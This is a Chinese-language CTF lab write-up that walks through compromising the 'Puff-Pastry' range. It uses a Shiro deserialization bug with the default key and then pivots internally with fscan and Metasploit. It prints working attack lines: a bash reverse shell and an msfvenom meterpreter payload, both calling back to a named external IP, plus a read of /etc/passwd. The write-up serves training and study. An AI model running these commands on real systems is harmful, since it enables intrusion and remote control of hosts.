CTF-Archives项目里非常不错的一个靶场
记录某靶场渗透测试
环境搭建
这里我是直接拿巨魔搭建的环境去打了,需要复现的请自行搭建
项目地址:https://github.com/CTF-Archives/Puff-Pastry
整体配置图如下
渗透过程
信息搜集
fscan扫描一下
1 | .\fscan.exe -h 139.9.4.56 |
扫描结果如下
扫出来8080端口存在shiro反序列化,密钥是默认密钥
1 | kPH+bIxk5D2deZiIxcaaaA== |
外网打点
我们访问一下8080端口,发现是登陆界面
打开shiro利用工具,修改为POST请求,添加上密钥看看
说明存在漏洞,并且爆出利用链
当前为root权限
直接写入内存马,然后蚁剑选择jsp连接类型连接
当然也可以写个sh文件来弹shell(这里SummerSec写的工具echo命令有问题,我换成v2.2版本写的)
1 | # bash -i >& /dev/tcp/156.238.233.68/1028 0>&1 |
蚁剑连接上后,在根目录下拿到第一个flag
联动蚁剑上线metasploit
先用msfvenom生成linux的马
1 | msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=156.238.233.68 LPORT=1028 -f elf -o payload.elf |
将生成的马上传到/tmp
目录下,赋予elf文件可执行权限
然后开启msf监听器
1 | use exploit/multi/handler |
再执行elf文件成功上线metasploit
内网渗透
因为蚁剑的shell权限比较高,所以直接在蚁剑进行信息收集
本机基础信息收集
查看网络配置信息
1 | ifconfig |
本机所处网段为192.168.100.0/24
查看操作系统信息
1 | uname -a |
尝试systeminfo发现不是windows系统,执行uname得到本机为Ubuntu系统
查看用户信息
1 | cat /etc/passwd |
探测内网存活主机
执行background
回到msf6会话,基于ARP协议来发现内网存活主机
1 | use auxiliary/scanner/discovery/arp_sweep |
这里换其他协议都扫不出来,那只能上传fscan来扫
1 | ./fscan -h 192.168.100.0/24 |
发现还存在ip为192.168.100.2
的主机
参考文章
Ubuntu安装metasploit
metasploit探测内网存活主机